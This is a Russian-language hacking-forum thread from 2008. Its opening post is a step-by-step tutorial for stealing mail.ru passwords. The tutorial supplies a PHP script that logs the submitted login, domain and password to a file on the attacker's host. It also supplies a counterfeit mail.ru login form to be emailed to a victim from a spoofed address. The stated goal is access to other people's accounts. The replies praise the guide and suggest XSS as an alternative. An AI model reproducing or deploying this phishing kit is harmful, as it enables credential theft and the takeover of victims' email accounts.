ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Взлом почты на mail.ru [СИ]
  #1  
Старый 06.06.2008, 20:12
Аватар для Chaak
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию Взлом почты на mail.ru [СИ]

[::.INTRO.::]

Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ", сами поймете.
Статья сгодится для новичков. Гуру просьба не читать.

[::.PREPARATION.::]

Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих:
*только заранее убедитесь что хостинг поддерживает PHP
Код:
km.ru 
nextmail.ru 
hobby.ru 
webrise.ru 
lapin.ru 
free.dl-hosting.ru 
hostow.net 
beplaced.ru 
777host.ru 
paltus.ru 
miraclehost.ru 
freebox.ru 
alfaspace.net 
k70.ru 
hosting.promostudio.ru 
chat.ru 
maxhost.ru 
nixup.com 
e2e.ru 
noka.ru 
newmail.ru 
boom.ru 
h15.ru 
hut.ru 
jino-net.ru 
pochta.ru 
unlimhost.ru 
onepage.ru 
by.ru 
sbn.bz 
yard.ru 
domainhosting.ru 
orthodoxy.ru 
webservis.ru 
ru-web.net 
activehost.ru 
househost.ru 
bestof.ru 
addr.ru 
hosting.dump.ru 
pesni.ru 
medbox.ru 
fatal.ru 
x5x.ru 
hopshot.com 
5gigs.com 
wagoo.com 
orgfree.com 
awardspace.com 
bobos.ca 
www.host.sk 
zportal.info 
spaceall.de 
3x.ro 
sretenie.ru 
dotgeek.org 
sevhosting.net 
o2g.net
www.jino-net.ru
www.nixup.com
newmail.ru
ho.com.ua/
wallSt.ru
hut.ru
holm.ru
e2e.ru
fatal.ru
host.sk
ut.ru
H1.ru
Hostmos.ru
Webm.ru
Rdcom.ru
narod.ru
front.ru
nm.ru 
chat.ru 
boom.ru 
by.ru
Зарегистрировали? - идем дальше!
Что нам нужно:
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):
PHP код:
<?php
$f
=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Рассмотрим скрипт поподробнее:
Код:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.
  • Сохраним в файл mes.php и зальем на хостинг.
  • Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777
Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код письма:
PHP код:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<
td id=aj_body>
<
div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<
table cellpadding=0 cellspacing=0 border=class=login>
<
tr>
<
td>Пользователь отправил вам скрытое письмо.<brДля просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</
tr>
</
table><font color=00;33;66 FACE="Arial" >
<
h4 >Авторизация</h4>
</
font>
<
table cellpadding=0 cellspacing=0 border=class=login>
<
form method="GET" action="http://адресссайта/mes.php">
<
input type="hidden" name="mail" value="1">
<
tr>
<
td width=75>
<
img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<
td width=150>
<
input type="text" name="Login">
</
td>
<
td width=75>
<
select name="Domain">
<
option value="mail.ru" SELECTED>@mail.ru</option>
<
option value="inbox.ru">@inbox.ru</option>
<
option value="list.ru" >@list.ru</option>
<
option value="bk.ru" >@bk.ru</option>
</
select>
</
td>
</
tr>
<
tr>
<
td>
Пароль
</td
<
td>
<
input type="password" name="Password">
</
td>
<
td>
<
a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</
td>
</
tr>

<
tr
<
td> </td>
<
td>
<
input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</
td>
<
td> </td>
</
tr>
<
tr>
<
td> </td>
<
td>
<
input type="Submit" value=" Войти " xstyle="margin-top:4px">
</
td>
<
td> </td>
</
tr></form>
</
table><br><br>
Чтобы подробней узнать об услугах посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<
base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div
Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адресса.
Сделать это можно здесь:
Цитата:
Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло).
Узнать пароли вы сможете в файлике mail.txt.

[::.END.::]

Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
Жду ваших отзывов.
До свидания!

Последний раз редактировалось ChaaK; 06.06.2008 в 20:32..
 
Ответить с цитированием

  #2  
Старый 06.06.2008, 20:17
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

видел много материала по фейкам но все было както разброшено.. сдесь все собрано и пошагово разсмотрено. вобшем ГУД.)

Последний раз редактировалось sabe; 06.06.2008 в 20:26..
 
Ответить с цитированием

  #3  
Старый 06.06.2008, 21:27
Аватар для satana8920
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

в принципе у каждого метода есть свои плюсы и минусы (без этого просто никак)
юудь то ббрут или протроянивание или фейки
поставил + статья наиболее полная для новичка
 
Ответить с цитированием

  #4  
Старый 06.06.2008, 21:39
Аватар для [:|||||:]
[:|||||:]
Banned
Регистрация: 29.05.2008
Сообщений: 116
Провел на форуме:
447871

Репутация: 208
Отправить сообщение для [:|||||:] с помощью ICQ Отправить сообщение для [:|||||:] с помощью AIM Отправить сообщение для [:|||||:] с помощью MSN Отправить сообщение для [:|||||:] с помощью Yahoo
По умолчанию

А как же это?
 
Ответить с цитированием

  #5  
Старый 06.06.2008, 22:19
Аватар для satana8920
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

Цитата:
Сообщение от ChaaK  
У меня такого ни разу не повлялось!
это можно обойти изменив буквы в словах!
так дополняй скорее свою статью
 
Ответить с цитированием

  #6  
Старый 07.06.2008, 04:47
Аватар для ufoPlast
ufoPlast
Участник форума
Регистрация: 24.02.2007
Сообщений: 121
Провел на форуме:
1026042

Репутация: 205
По умолчанию

Цитата:
Сообщение от Zitt  
ерунда.. даже на ачате такихже статей куча.... ненадо было писать)
Статья не супер, но из-за таких как вы, считающих себя гуру, новые статьи редко пишутся! Людям просто не хочется писать статьи во избежании такой тупой критики... Что это за аргумент? -ерунда, говно и т.д. Напиши свой способ.
Сам сталкивался с такой штукой, пишешь статью, а ее удаляют. Причиной назвали сложность осуществления предложенного метода... Я чуть под стол не упал...
Я считаю не нужно отбивать у людей желание писать, хоть что то...
 
Ответить с цитированием

  #7  
Старый 07.06.2008, 08:04
Аватар для m9chik
m9chik
Познающий
Регистрация: 20.06.2007
Сообщений: 99
Провел на форуме:
1129104

Репутация: 122
По умолчанию

Моё мнение:
Не сложно,просто.
Но таких тем действительно было оч много.
Это называеться фейк и автор ничё про это не сказал.
Но и в тоже время от этого фейка мало что будет поскольку я чёто запутолся тем что будет отпровляться пись,а тама будет запрос авторизации. и тутже тама будет висеть табличка от администрации.
 
Ответить с цитированием

  #8  
Старый 07.06.2008, 10:41
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

Цитата:
Сообщение от ChaaK  
Предложите что-нибудь лучше, кроме брута и протроянивания.
XSS или XSS + ФЕЙК ...
 
Ответить с цитированием

  #9  
Старый 07.06.2008, 15:32
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...

Последний раз редактировалось Zitt; 07.06.2008 в 15:51..
 
Ответить с цитированием

  #10  
Старый 07.06.2008, 15:52
Аватар для byblik
byblik
Участник форума
Регистрация: 01.10.2006
Сообщений: 172
Провел на форуме:
1680584

Репутация: 73
По умолчанию

Цитата:
Сообщение от Zitt  
ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...
А я соглашусь с ufoPlast, все он правильно сказал.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом почты mail.ru rambler яндекс и др. lotos99 О Работе 0 11.05.2008 13:36
Взлом почты на Mail.Ru под заказ Gen. Lee О Работе 0 12.03.2008 12:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ